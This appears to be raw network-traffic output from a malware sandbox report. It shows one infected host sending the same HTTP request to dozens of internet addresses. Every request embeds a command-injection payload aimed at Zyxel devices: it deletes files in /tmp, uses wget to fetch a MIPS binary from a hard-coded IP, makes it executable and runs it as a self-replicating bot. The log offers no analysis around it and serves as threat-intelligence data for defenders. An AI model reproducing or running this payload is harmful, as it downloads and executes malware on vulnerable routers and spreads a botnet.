                                                Jan 29, 2024 07:07:38.119685888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1948192.168.2.2339256177.162.121.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119740963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1949192.168.2.2356904222.102.225.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119807005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1950192.168.2.235275638.204.141.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119884014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1951192.168.2.234555823.13.105.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119931936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1952192.168.2.234550292.47.254.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.119972944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1953192.168.2.234901264.111.170.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.120034933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1954192.168.2.234050013.131.120.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.126560926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1955192.168.2.2352070200.227.124.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.126637936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1956192.168.2.2333754133.84.130.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123002052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1957192.168.2.2354506161.125.67.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123168945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1958192.168.2.2336654105.14.115.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123183012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1959192.168.2.236006283.75.4.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123219013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1960192.168.2.2350084207.165.189.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123250008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1961192.168.2.235297243.81.146.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123298883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1962192.168.2.2350118110.239.206.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123325109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1963192.168.2.2335196201.212.234.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123418093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1964192.168.2.2343516134.225.99.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123465061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1965192.168.2.235532095.249.82.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123497009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1966192.168.2.234770059.202.152.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123532057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1967192.168.2.236014820.99.249.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123591900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1968192.168.2.2348502159.215.197.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123613119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1969192.168.2.2350952115.42.116.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123646975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1970192.168.2.235369497.30.81.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123734951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1971192.168.2.233411483.11.117.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123780012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1972192.168.2.2333358187.203.98.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123804092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1973192.168.2.2352798124.213.168.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123872042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1974192.168.2.2345418175.63.72.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123929024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1975192.168.2.235412037.108.72.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.123992920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1976192.168.2.236069836.64.81.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124011040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1977192.168.2.235080627.161.80.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124054909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1978192.168.2.234901674.179.143.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124094009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1979192.168.2.2337576113.255.214.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124149084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1980192.168.2.233682477.236.7.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124192953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1981192.168.2.2337032159.203.110.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124238014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1982192.168.2.2355268199.182.158.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124260902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1983192.168.2.2360210159.105.20.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124308109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1984192.168.2.234774231.119.79.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124341965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1985192.168.2.2358520174.14.214.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124418974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1986192.168.2.2337138182.114.173.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124420881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1987192.168.2.235822035.3.36.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124471903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1988192.168.2.2356330112.88.183.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124515057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1989192.168.2.2340132196.210.207.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124546051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1990192.168.2.234612062.87.103.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124593019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1991192.168.2.2338834131.94.204.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124622107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1992192.168.2.2343950207.181.223.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124680042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1993192.168.2.2346428163.101.0.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124717951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1994192.168.2.234854299.237.98.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124771118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1995192.168.2.2352194206.119.203.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124787092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1996192.168.2.235966657.58.175.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124823093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1997192.168.2.2342694152.140.71.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124897957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1998192.168.2.2353242209.7.216.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124962091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1999192.168.2.236092676.100.229.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.124998093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2000192.168.2.2335628193.201.225.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125055075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2001192.168.2.2349074136.147.193.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125082970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2002192.168.2.233654450.223.141.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125111103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2003192.168.2.2344886203.242.121.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125161886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2004192.168.2.2359530101.42.90.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125190973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2005192.168.2.23525041.85.101.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125243902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2006192.168.2.233497427.122.23.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125277042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2007192.168.2.233514879.204.113.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125313997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2008192.168.2.235673288.150.22.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125364065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2009192.168.2.233318017.39.187.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125392914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2010192.168.2.2335670189.172.245.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.125443935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2011192.168.2.2334638213.134.96.41443
                                                TimestampBytes transferredDirectionData
